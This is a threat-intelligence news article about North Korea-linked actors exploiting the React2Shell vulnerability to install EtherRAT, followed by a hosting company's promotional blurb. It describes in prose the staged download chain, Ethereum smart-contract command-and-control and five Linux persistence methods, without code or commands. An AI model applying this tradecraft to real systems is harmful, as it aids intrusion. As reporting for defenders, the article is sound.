Threat actors linked to North Korea have emerged as players exploiting a recently disclosed critical security vulnerability known as React2Shell in React Server Components (RSC) to deploy a new remnant in their malicious arsenal dubbed EtherRAT.
According to a report from cloud security firm Sysdig, EtherRAT utilizes Ethereum smart contracts for command-and-control (C2) communications, incorporates five independent persistence methods for Linux environments, and downloads its own Node.js runtime from official sources.
This activity aligns with a longstanding campaign referred to as Contagious Interview, where blockchain and Web3 developers are targeted through deceptive job offers, coding tasks, and video interviews that result in malware installation. The campaigns primarily lure victims via platforms like LinkedIn and Upwork, leading to the deployment of malware after initial engagement.
Security company Socket noted that this campaign is notably aggressive, taking advantage of JavaScript and cryptocurrency-centric workflows, underscoring its proficiency in exploiting npm ecosystems.
The attack exploits the CVE-2025-55182 vulnerability, scoring a maximum severity of 10.0. Attackers execute a Base64-encoded shell command, which then downloads a shell script tasked with deploying the primary JavaScript implant. This script will be sourced using curl, with wget and python3 as backups. It prepares the environment by downloading Node.js v20.10.0, followed by deploying an encrypted blob and an obfuscated JavaScript dropper.
The dropper’s function is to decrypt the EtherRAT payload using a hard-coded key and to initiate it using the downloaded Node.js binary. Its unique feature is the incorporation of EtherHiding for retrieving the C2 server address from an Ethereum smart contract at five-minute intervals, allowing for continuous updates even when the original URL goes offline.
Sysdig pointed out that this C2 mechanism employs a consensus voting system across nine public Ethereum remote procedure call (RPC) endpoints. This strategy protects against potential attacks, ensuring that a single compromised RPC node cannot misdirect the infected systems.
Upon contacting the C2 server, EtherRAT engages in a polling loop every 500 milliseconds, interpreting extended responses as JavaScript code for execution on the infected machine. Its persistence is guaranteed through multiple methods:
- Systemd user service
- XDG autostart entry
- Cron jobs
- .bashrc injection
- Profile injection
This multifaceted approach ensures continued malware running even after system reboots. Furthermore, EtherRAT has self-update capabilities, overwriting itself with new code from the C2 server after transmitting its source code to an API endpoint.
Recently, updates on the Contagious Interview campaign reveal its adaptation from npm to Microsoft’s Visual Studio Code. Victims are now encouraged to clone malicious repositories, which execute payloads upon opening the corresponding project in VS Code due to specific configurations, further extending the malware’s reach and sophistication.
Such developments suggest that North Korean actors may be evolving their strategies, posing complex challenges for cybersecurity defenses against these persistent threats.
Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.